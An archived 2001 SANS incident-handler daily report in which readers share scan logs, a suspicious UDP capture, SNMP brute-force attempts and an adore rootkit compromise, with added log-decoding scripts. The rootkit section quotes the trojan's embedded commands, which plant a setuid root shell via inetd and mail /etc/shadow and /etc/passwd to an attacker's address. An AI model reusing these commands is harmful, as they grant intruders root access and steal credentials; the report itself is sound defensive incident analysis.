

Global Incident Analysis Center

Report Date: April 25, 2001 - 1200

Handler on Duty: Matt Fearnow  (Comments in parentheses - send all reports to intrusion@sans.org)
Infocon: Green

Handler Comments:
I would like to invite you all to the pre-opening of Incidents.org. It will become the replacement of this site (sans.org/y2k). If you all could check it out, let us know if you have questions or concerns. Over the next few days, we will finish migrating everything over to it. http://www.incidents.org

You may be asking why the move from the SANS/GIAC site. Well, to answer that question, we felt the names GIAC (Global Information Assurance Certification) and GIAC (Global Incident Analysis Center) were too similar. So we decided to move the Analysis Center to Incidents.org. We will continue to provide the information and analysis of log files, plus some new features.

There are now several ways for you to submit your logs and to ask questions.

  • Subscribe to intrusions@incidents.org. This list is for help with an intrusion or reading your log files (similar to intrusion@sans.org, except it is a "true" mailing list). We will soon have the archives of this mailing list posted on the website. *Note* to subscribe, send an email to intrusions-subscribe@incidents.org, or for info, intrusions-help@incidents.org.
  • Subscribe to discussion@incidents.org. This list is for general discussion. We will soon have the archives of this mailing list posted on the website as well. There is also a digest of this mailing list available. *Note* to subscribe, send an email to discussion-subscribe@incidents.org, or for info, discussion-help@incidents.org.
  • Email to handler@incidents.org. This is an email alias to the handlers at Incidents.org. This email is not posted to any mailing list and is not archived or posted to a website.
  • We will soon be accepting log submissions via other means. If you would like, you can start submitting your logs to one of our Partner sites, which have agents for various log formats.
Detects Analyzed:
(George Bakos)
Interesting bit of udp traffic broadcasting from a winnt box upon boot-up.
Haven't had a decent look at it yet, but the traffic pattern alone is
noteworthy.  The user indicates that he ran a binary email attachment (arrrgh!)
a few days ago and since then his A-V won't successfully start up.

Note the hex dump of the udp payload. I particularly like the byte-order
reversal in the 2nd and 3rd packets.

  6  941.523013 10.1.53.192 -> 10.1.53.255  UDP Source port: 1040  Destination port: 54322

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 5c16 0a01 350d 0a01   .!..@.@.\.......
  20  35ff 0410 d432 000d 7c18 1fab babe     5....2..|.....
 
  7  941.526657 10.1.53.192 -> 10.255.255.255 UDP Source port: 1041  Destination port: 54322

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 9117 0a01 350d 0aff   .!..@.@.........
  20  ffff 0411 d432 000d b118 beba ab1f     .....2........                                  

  8  941.529657 10.1.53.192 -> 255.255.255.255 UDP Source port: 1042  Destination port: 54322

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 9117 0a01 350d ffff   .!..@.@.........
  20  ffff 0411 d432 000d b118 beba ab1f     .....2........                                  
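
(Editor's added example, not part of George Bakos's post.) The script below transcribes the three hex dumps above into bytes, walks the Ethernet II / IPv4 / UDP headers, checks the declared lengths and the IP header checksum against what was actually captured, and compares consecutive payloads to confirm the byte-order reversal. The frame bytes are constructed from the dumps exactly as printed. Be aware that the summary lines and the header bytes disagree in places: the IP source in the bytes decodes to 10.1.53.13 while the summary says 10.1.53.192, the third dump carries the same UDP source port and checksums as the second although the summary says port 1042, the UDP length field claims one byte more than each dump contains, and the IP header checksums do not verify. That is what one would expect if addresses were edited before posting, so the decoder reports what the bytes say rather than trusting the summary, and these dumps should not be fed unchanged to a checksum-strict tool.

```python
"""Decode the three UDP broadcast frames from the hex dumps above.

Added example. FRAMES_HEX is transcribed from the dumps as printed in the post
(addresses apparently edited before posting, so header checksums do not verify).
"""
import struct
from dataclasses import dataclass

FRAMES_HEX = [
    # frame 6: -> 10.1.53.255, UDP 1040 -> 54322
    "00a024c65a1e00902787ff980800"
    "450000210000400040115c160a01350d0a0135ff"
    "0410d432000d7c18"
    "1fabbabe",
    # frame 7: -> 10.255.255.255, UDP 1041 -> 54322
    "00a024c65a1e00902787ff980800"
    "4500002100004000401191170a01350d0affffff"
    "0411d432000db118"
    "bebaab1f",
    # frame 8: -> 255.255.255.255 (the dump shows the same UDP header bytes as frame 7)
    "00a024c65a1e00902787ff980800"
    "4500002100004000401191170a01350dffffffff"
    "0411d432000db118"
    "bebaab1f",
]


def ip_header_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's-complement sum of 16-bit words, checksum field zeroed."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    if len(zeroed) % 2:
        zeroed += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(zeroed) // 2), zeroed))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class UdpFrame:
    dst_mac: str
    src_mac: str
    src_ip: str
    dst_ip: str
    ip_checksum_ok: bool
    src_port: int
    dst_port: int
    udp_len: int
    payload: bytes
    missing_bytes: int  # declared UDP length minus UDP bytes actually present in the dump


def _mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def decode_frame(raw: bytes) -> UdpFrame:
    """Walk Ethernet II -> IPv4 -> UDP and return the fields plus consistency checks."""
    if len(raw) < 14 + 20 + 8:
        raise ValueError("frame too short for Ethernet/IPv4/UDP")
    ethertype = struct.unpack("!H", raw[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not IPv4 (ethertype 0x%04x)" % ethertype)
    ip = raw[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 17:
        raise ValueError("IP protocol %d is not UDP" % ip[9])
    hdr = ip[:ihl]
    cksum_ok = ip_header_checksum(hdr) == struct.unpack("!H", hdr[10:12])[0]
    udp = ip[ihl:total_len]  # bounded by the IP total length, but only as far as bytes exist
    sport, dport, ulen, _udp_cksum = struct.unpack("!HHHH", udp[:8])
    return UdpFrame(
        dst_mac=_mac(raw[:6]), src_mac=_mac(raw[6:12]),
        src_ip=".".join(str(x) for x in hdr[12:16]),
        dst_ip=".".join(str(x) for x in hdr[16:20]),
        ip_checksum_ok=cksum_ok,
        src_port=sport, dst_port=dport, udp_len=ulen,
        payload=udp[8:], missing_bytes=ulen - len(udp),
    )


def payload_relation(a: bytes, b: bytes) -> str:
    """Classify how two payloads relate; 'byte-reversed' is the pattern the post points out."""
    if a == b:
        return "identical"
    if a == b[::-1]:
        return "byte-reversed"
    return "different"


def analyse(frames_hex=FRAMES_HEX):
    frames = [decode_frame(bytes.fromhex(h)) for h in frames_hex]
    relations = [payload_relation(frames[i].payload, frames[i + 1].payload)
                 for i in range(len(frames) - 1)]
    return frames, relations


if __name__ == "__main__":
    frames, relations = analyse()
    for f in frames:
        print(f"{f.src_ip}:{f.src_port} -> {f.dst_ip}:{f.dst_port} dst_mac={f.dst_mac} "
              f"payload={f.payload.hex()} udp_len={f.udp_len} missing={f.missing_bytes} "
              f"ip_cksum_ok={f.ip_checksum_ok}")
    print("payload relations between consecutive frames:", relations)
```

One more thing the decode makes visible: the destination MAC in all three frames is a unicast address, not ff:ff:ff:ff:ff:ff, so at layer 2 these were not broadcast; they were handed to one specific station even though the IP destinations are broadcast addresses.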

+++

(Thomas Swingle)
Scans/probes - a lot of them coming from Korea (KRNIC).
 
FWIN,2001/04/09,18:39:45 -7:00 GMT,211.223.234.3:3465,63.194.199.xxx:53,TCP (flags:S)
FWIN,2001/04/09,19:40:28 -7:00 GMT,210.62.171.14:2482,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/11,09:16:03 -7:00 GMT,193.159.110.86:62853,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/11,09:16:09 -7:00 GMT,193.159.110.86:62903,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/11,14:54:53 -7:00 GMT,203.144.217.163:2051,63.194.199.xxx:53,TCP (flags:S)
FWIN,2001/04/11,17:37:32 -7:00 GMT,212.41.198.191:4428,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/13,11:53:17 -7:00 GMT,209.217.19.120:111,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/13,12:21:52 -7:00 GMT,193.136.215.126:2401,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/14,10:47:25 -7:00 GMT,211.49.127.38:21,63.194.199.222:21,TCP (flags:SF)
FWIN,2001/04/14,10:49:41 -7:00 GMT,202.157.133.184:1998,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/16,14:37:43 -7:00 GMT,216.216.32.4:0,63.194.199.xxx:0,ICMP (type:8/subtype:0)
FWIN,2001/04/16,17:27:09 -7:00 GMT,211.250.245.67:2938,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/16,17:44:37 -7:00 GMT,210.110.22.123:1740,63.194.199.xxx:111,TCP (flags:S)
 
+++

(Anonymous)
hmmmmm distributed scan?  I'll have to go through the rest
of my logs.  All these packets arrived within a second of
each other.  Anyone else seen this?

Adding mark 24.115.180.238:4703->134.50.5.7:1243
Total Marks: 68
Adding mark 24.115.180.238:4704->134.50.5.7:27374
Total Marks: 69
Adding mark 200.222.64.218:61019->134.50.5.7:12345
Total Marks: 70
Adding mark 200.222.64.218:61020->134.50.5.7:31337
Total Marks: 71
Adding mark 200.222.64.218:61021->134.50.5.7:12345
Total Marks: 72
Adding mark 200.222.64.218:61025->134.50.5.7:31337
Total Marks: 73

+++

(Chris Reynolds)
(Here's a new one - looks like someone wanted control of my server pretty
badly. Too bad for them. I'll be filing criminal charges on this one.)

99       2001-04-16 21:06:43    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.34    community=MGCIwrite    1
39       2001-04-16 21:06:43    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.34    port=161       6
99       2001-04-16 21:06:44    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.35    community=MGCIwrite    1
39       2001-04-16 21:06:44    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.35    port=161       6
99       2001-04-16 21:06:44    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.40    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.40    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.42    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.42    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.44    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.44    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.46    community=MGCIwrite    1
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.45    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.45    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.47    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.47    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.49    community=MGCIwrite    1

+++

(Michael Dwyer)
Scan volumes have increased, here.  Normally, I wouldn't even bother you
with it, but today I came in to work, and the Linux-2.2.18 ipmasq box
had panicked, following a number of up/down cycles of the T1 link. I
think everything is still secure, but I'm curious if anyone else has
seen this?

Apr 16 18:57:09: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3213) -> DMZ.NET.169.48(111), 1 packet
Apr 16 18:57:12: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3223) -> DMZ.NET.169.57(111), 1 packet
Apr 16 19:02:25: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3219) -> DMZ.NET.169.54(111), 1 packet
Apr 16 22:12:10: %SEC-6-IPACCESSLOGP: list 101 denied tcp
210.71.174.26(53) -> DMZ.NET.169.48(53), 1 packet
Apr 16 22:36:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp
63.214.90.206(2797) -> DMZ.NET.169.48(1080), 1 packet
Apr 16 22:41:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
211.54.39.50(3224) -> INET.T1.CON.26(111), 1 packet
Apr 16 22:41:32: %SEC-6-IPACCESSLOGP: list 101 denied tcp
63.214.90.206(2812) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 00:24:48: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.33.60.225(4190) -> DMZ.NET.169.48(53), 1 packet
Apr 17 00:30:36: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.33.60.225(4205) -> DMZ.NET.169.63(53), 2 packets
Apr 17 01:13:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
62.122.22.238(23) -> DMZ.NET.169.48(23), 1 packet
Apr 17 02:04:29: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2687) -> DMZ.NET.169.51(111), 1 packet
Apr 17 02:04:32: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2689) -> DMZ.NET.169.53(111), 1 packet
Apr 17 02:09:39: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2698) -> DMZ.NET.169.62(111), 1 packet
Apr 17 03:08:19: %SEC-6-IPACCESSLOGP: list 101 denied tcp
128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 03:13:41: %SEC-6-IPACCESSLOGP: list 101 denied tcp
128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 03:14:26: %SEC-6-IPACCESSLOGP: list 101 denied tcp
217.58.40.250(1552) -> INET.T1.CON.26(111), 1 packet
Apr 17 04:02:22: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1572) -> DMZ.NET.169.48(1080), 1 packet
Apr 17 04:02:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1704) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 04:02:27: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1891) -> DMZ.NET.169.48(1080), 1 packet
Apr 17 04:02:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(2055) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 04:02:52: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(2841) -> DMZ.NET.169.48(1080), 1 packet
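
(Editor's added example, not part of Michael Dwyer's post.) A triage pass over access-list records like the ones above: it parses the IOS %SEC-6-IPACCESSLOGP format, groups denies by source, and tags each source as a horizontal sweep (one port across several hosts), a vertical scan (several ports on one host), a retry (the same source port and 4-tuple logged again, as with the 19216 entries), or a probe whose source port equals its destination port (seen from some scanners, and worth a second look). SAMPLE_LOG is a subset of the post's entries with the two-line wrapping re-joined into one record per line; the year is assumed because IOS timestamps carry none, and the classification rules are heuristics of mine, not anything the post states.

```python
"""Triage Cisco IOS %SEC-6-IPACCESSLOGP deny records: who is sweeping what.

Added example, not part of the original post. SAMPLE_LOG re-joins a subset of
the wrapped log lines from the post into one line per record; the year is
assumed (IOS timestamps carry none) and the classification rules are heuristics.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d): %SEC-6-IPACCESSLOGP: "
    r"list (?P<acl>\S+) (?P<action>denied|permitted) (?P<proto>\w+) "
    r"(?P<src>\S+)\((?P<sport>\d+)\) -> (?P<dst>\S+)\((?P<dport>\d+)\), "
    r"(?P<count>\d+) packets?$"
)
ASSUMED_YEAR = 2001  # assumption: IOS syslog timestamps carry no year

# Constructed from the post's entries (wrapped pairs joined into single lines).
SAMPLE_LOG = """\
Apr 16 18:57:09: %SEC-6-IPACCESSLOGP: list 101 denied tcp 212.236.6.2(3213) -> DMZ.NET.169.48(111), 1 packet
Apr 16 18:57:12: %SEC-6-IPACCESSLOGP: list 101 denied tcp 212.236.6.2(3223) -> DMZ.NET.169.57(111), 1 packet
Apr 16 19:02:25: %SEC-6-IPACCESSLOGP: list 101 denied tcp 212.236.6.2(3219) -> DMZ.NET.169.54(111), 1 packet
Apr 16 22:12:10: %SEC-6-IPACCESSLOGP: list 101 denied tcp 210.71.174.26(53) -> DMZ.NET.169.48(53), 1 packet
Apr 16 22:36:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp 63.214.90.206(2797) -> DMZ.NET.169.48(1080), 1 packet
Apr 16 22:41:32: %SEC-6-IPACCESSLOGP: list 101 denied tcp 63.214.90.206(2812) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 03:08:19: %SEC-6-IPACCESSLOGP: list 101 denied tcp 128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 03:13:41: %SEC-6-IPACCESSLOGP: list 101 denied tcp 128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 04:02:22: %SEC-6-IPACCESSLOGP: list 101 denied tcp 216.119.50.81(1572) -> DMZ.NET.169.48(1080), 1 packet
Apr 17 04:02:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp 216.119.50.81(1704) -> DMZ.NET.169.63(1080), 1 packet
"""


@dataclass
class Event:
    ts: datetime
    acl: str
    action: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    count: int


@dataclass
class Triage:
    tags: list          # heuristic labels, see triage()
    ports: list         # destination ports this source touched
    hosts: int          # distinct destination hosts this source touched
    span_seconds: float  # first to last record from this source


def parse(text: str) -> list:
    """Parse IPACCESSLOGP records; unrelated IOS messages are skipped, not errors."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        stamp = f"{ASSUMED_YEAR} " + " ".join(d["ts"].split())  # collapse 'Apr  7' spacing
        ts = datetime.strptime(stamp, "%Y %b %d %H:%M:%S")
        events.append(Event(ts, d["acl"], d["action"], d["proto"], d["src"],
                            int(d["sport"]), d["dst"], int(d["dport"]), int(d["count"])))
    return events


def triage(events) -> dict:
    """Group by source and tag the pattern each source shows."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)
    report = {}
    for src, evs in by_src.items():
        hosts_by_port = defaultdict(set)
        ports_by_host = defaultdict(set)
        tuples = Counter()
        for e in evs:
            hosts_by_port[e.dport].add(e.dst)
            ports_by_host[e.dst].add(e.dport)
            tuples[(e.sport, e.dst, e.dport)] += 1
        tags = []
        if any(len(h) > 1 for h in hosts_by_port.values()):
            tags.append("horizontal-sweep")    # one service, many hosts
        if any(len(p) > 1 for p in ports_by_host.values()):
            tags.append("vertical-scan")       # many services on one host
        if any(e.sport == e.dport for e in evs):
            tags.append("sport-equals-dport")  # fixed source port; look at the tool, not just the IP
        if any(n > 1 for n in tuples.values()):
            tags.append("repeated-4-tuple")    # same source port again: a retry, not a new probe
        span = (max(e.ts for e in evs) - min(e.ts for e in evs)).total_seconds()
        report[src] = Triage(tags, sorted(hosts_by_port), len(ports_by_host), span)
    return report


if __name__ == "__main__":
    for src, t in triage(parse(SAMPLE_LOG)).items():
        print(f"{src:16} ports={t.ports} hosts={t.hosts} span={t.span_seconds:.0f}s tags={t.tags}")
```

The span figure is what answers the "all within a second of each other" question asked in the Anonymous report above: a sweep whose records land within a couple of seconds of one another is one tool run, whereas the same source reappearing hours apart with a new source port is a second visit.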

+++

(Rich Parker)
I seem to see a lot of unexpected activity from this
dip.t-dialin.net, whoever they are (a German ISP). I got this
in my logs a couple of times, and wrote to them but got no
response. I am inclined to think they just need to be blocked
altogether, but thought I'd pass it along because I saw a
similar report today on www.sans.org/y2k/041701.htm

I think it's time someone put this ISP on notice that this will
not be tolerated.

My logs which correlate to today's reports (except I don't
allow any anonymous FTPs). As I noted, this is not the first
time I have seen this sort of poking around from someone on
dip.t-dialin.net - normally the odd anonymous ftp request
wouldn't generate that much notice, but given the repeated
activity and today's report I think it escalates it to a higher
level of interest.

Security Violations
=-=-=-=-=-=-=-=-=-=
Apr  7 23:29:06 relay ftpd[11117]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net
Apr  7 23:29:06 relay ftpd[11119]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net
Apr  7 23:29:06 relay ftpd[11116]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net 
Apr  7 23:29:06 relay ftpd[11118]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net

+++
(John Ferriby)
We have experienced an attack using the adore root kit. We have noticed
several attributes not mentioned in your messages.

1) The root kit was installed in /usr/lib/kerneld along with numerous other
   utilities.
2) Using adore, several processes were cloaked, including a remote-root UDP
   shell that attached to port 1042.
3) Numerous major utilities were altered in /bin, /sbin, /usr/sbin, /usr/bin.
4) Files were cloaked in all of these directories. In that case, they would
   not show up unless directly requested, e.g.:

   #ls /usr/sbin/k*             -produced no results
   #ls /usr/sbin/kernel.pl      -found the perl script that the intruder left.
                                 (the UDP port server!)

5) All of the utilities that were altered performed "reopening" the hole and
   sent mail to either
   gushlair@gmx.net or
   mail -s GRK1BD79-Activated gushlair@bigfoot.com
   mail -s GRK1BD25-Activated gushlair@bigfoot.com

6) rmmod, lsmod, modprobe, insmod were disabled. (They now segfault.)
7) An IRC robot was installed. This appears to allow remote (!) control of
   the system. (undernet)
8) A clandestine packet sniffer was installed too, "snuffer", which reset
   the promiscuous bit. The interfaces are all switched and the machine
   receives little ftp/telnet/pop traffic. It appears that all
   names/passwords garnered were local. SSH is used for many other issues
   and does not appear to be compromised. Passwords were stored in
   /var/spool/.sw
9) No users were added, but the irc code referred to "Batman" and "Batman1"
   and "Lair".
10) It appears that the attack came from a) kamel.total.net [abuse@psi.net
    has been contacted.], b) various sites in Romania and c) various sites
    in Brazil.
11) The attack appears to have begun at about 10 am eastern April 10; it was
    discovered at 6:30 am eastern on the 11th.

Below is an example of the code that is embedded in many utilities:

[root@video4 sbin]# strings -f /bin/touch | grep -8 lair
/bin/touch:       --version          output version information and exit
/bin/touch: Note that the three time-date formats recognized for the -d
and -t options
/bin/touch: and for the obsolescent argument are all different.
/bin/touch: Report bugs to .
/bin/touch: /usr/local/share/locale
/bin/touch: fileutils
/bin/touch: acgd:fmr:t:
/bin/touch: invalid date format `%s'
/bin/touch:       And the lair is open...
/bin/touch: cp -f /bin/sh /bin/support
/bin/touch: chown root:root /bin/support
/bin/touch: chmod 777 /bin/support
/bin/touch: chmod +s /bin/support
/bin/touch: echo 1529 stream tcp nowait root /usr/sbin/tcpd /bin/support -i
>> /etc/inetd.conf
/bin/touch: killall -HUP inetd
/bin/touch: inetd
/bin/touch: grep -v 1529 /etc/inetd.conf >> /etc/inetd.conf2
--
/bin/touch: echo =-=-=-=-=-= >> /tmp/.mailtmp
/bin/touch: w >> /tmp/.mailtmp
/bin/touch: ps -ef >> /tmp/.mailtmp
/bin/touch: netstat -an >> /tmp/.mailtmp
/bin/touch: /sbin/ifconfig >> /tmp/.mailtmp
/bin/touch: /sbin/ip neigh >> /tmp/.mailtmp
/bin/touch: cat /etc/shadow >> /tmp/.mailtmp
/bin/touch: cat /etc/passwd >> /tmp/.mailtmp
/bin/touch: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/touch: rm -rf /tmp/.mailtmp
/bin/touch: --time
/bin/touch: Paul Rubin, Arnold Robbins, Jim Kingdon, David MacKenzie, and
Randy Smith
/bin/touch: 4.0p
/bin/touch: GNU fileutils
/bin/touch: touch
/bin/touch: cannot specify times from more than one source
/bin/touch: file arguments missing
[root@video4 sbin]#

Below are the utilities affected in /bin

/bin/chown:       And the lair is open...
/bin/chown: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/df:       And the lair is open...
/bin/df: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ln:       And the lair is open...
/bin/ln: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ls:       And the lair is open...
/bin/ls: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/mkdir:       And the lair is open...
/bin/mkdir: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/mv:       And the lair is open...
/bin/mv: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ping:       And the lair is open...
/bin/ping: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/pwd:       And the lair is open...
/bin/pwd: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/rm:       And the lair is open...
/bin/rm: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/rmdir:       And the lair is open...
/bin/rmdir: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/su:       And the lair is open...
/bin/su: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/touch:       And the lair is open...
/bin/touch: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/true: --lair
/bin/true:       And the lair is open...
/bin/true: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
[root@video4 sbin]#

Nothing (??!?) appears to be altered in /sbin

In /usr/sbin:

[root@video4 sbin]# strings -f /usr/sbin/* | grep lair
/usr/sbin/in.fingerd:       And the lair is open...
/usr/sbin/in.fingerd: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/in.ftpd: gushlair
/usr/sbin/in.ftpd.grk: gushlair
/usr/sbin/in.wuftpd: gushlair
/usr/sbin/sendmail-infected:       And the lair is open...
/usr/sbin/sendmail-infected: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/sendmail-infected:       And the lair is open...
/usr/sbin/sendmail-infected: cat /tmp/.mailtmp|mail -s GRK1BD25-Activated
gushlair@bigfoot.com
/usr/sbin/traceroute:       And the lair is open...
/usr/sbin/traceroute: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/wu.ftpd: gushlair
[root@video4 sbin]#

And in /usr/bin:

/usr/bin/du:       And the lair is open...
/usr/bin/du: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/finger:       And the lair is open...
/usr/bin/finger: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/id:       And the lair is open...
/usr/bin/id: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
strings: /usr/bin/kbdrate: No such file or directory
/usr/bin/pinky:       And the lair is open...
/usr/bin/pinky: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/who:       And the lair is open...
/usr/bin/who: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/whoami:       And the lair is open...
/usr/bin/whoami: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com

Here are the contents of the /usr/lib/kerneld:

[root@video4 sbin]# ls -l /usr/lib/kerneld
total 1276
-rw-rw-r--    1 root     root           32 Apr 10 11:22 akeys
-rwxrwxr-x    1 root     root        14738 Apr 10 11:22 ava
-rwxrwxr-x    1 root     root         4196 Apr 10 11:22 gen
-rwsr-sr-x    1 root     root       373176 Apr 10 11:22 kerneld
-rwxr-xr-x    1 root     root         1025 Apr 10 11:22 logrotate
drwx--x--x    3 root     root         4096 Apr 12 04:15 mech
-rwxr-xr-x    1 root     root        18185 Apr 12 12:44 n
-rw-r--r--    1 root     root         6323 Apr 12 12:43 n.c
-rw-r--r--    1 root     root       102988 Apr 17 09:35 netbeui.log
drwx------    5 john     john         4096 Apr 12 14:12 nmap-2.53
-rw-r--r--    1 root     root       584385 Apr 12 13:50 nmap.tgz
-rw-r--r--    1 root     root         3956 Apr 12 13:00 out.txt
drwxr-xr-x    5 root     root         4096 Feb  5 12:58 psybnc
-rwxrwxr-x    1 root     root         4984 Apr 10 11:22 scan
-rwxrwxr-x    1 root     root         4060 Apr 10 11:22 sense
-rwxrwxr-x    1 root     root         6124 Apr 10 11:22 sl2
-rwxrwxr-x    1 root     root         5008 Apr 10 11:22 snifu
drwxr-xr-x    2 root     root         4096 Apr 10 11:22 stat
-rwxrwxr-x    1 root     root        11376 Apr 10 11:22 statdx
-rwxr-xr-x    1 root     root        33116 Apr 10 11:22 tfn
-rwxr-xr-x    1 root     root          662 Apr 10 11:22 udpshclient.pl
-rwxr-xr-x    1 root     root        11540 Apr 10 11:22 wsnf
-rwxrwxr-x    1 root     root        26900 Apr 10 11:22 wu
-rwxrwxr-x    1 root     root         5548 Apr 10 11:22 wus
-rw-rw-r--    1 root     root           59 Apr 10 11:22 www.log
-rwxr-xr-x    1 root     root         1438 Apr 10 11:22 z1
-rwxrwxr-x    1 root     root         4036 Apr 10 11:22 z2
[root@video4 sbin]#

You may contact me for more information or inspection if you need. The
system is quarantined and will be re-imaged on Friday, 20 April.
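
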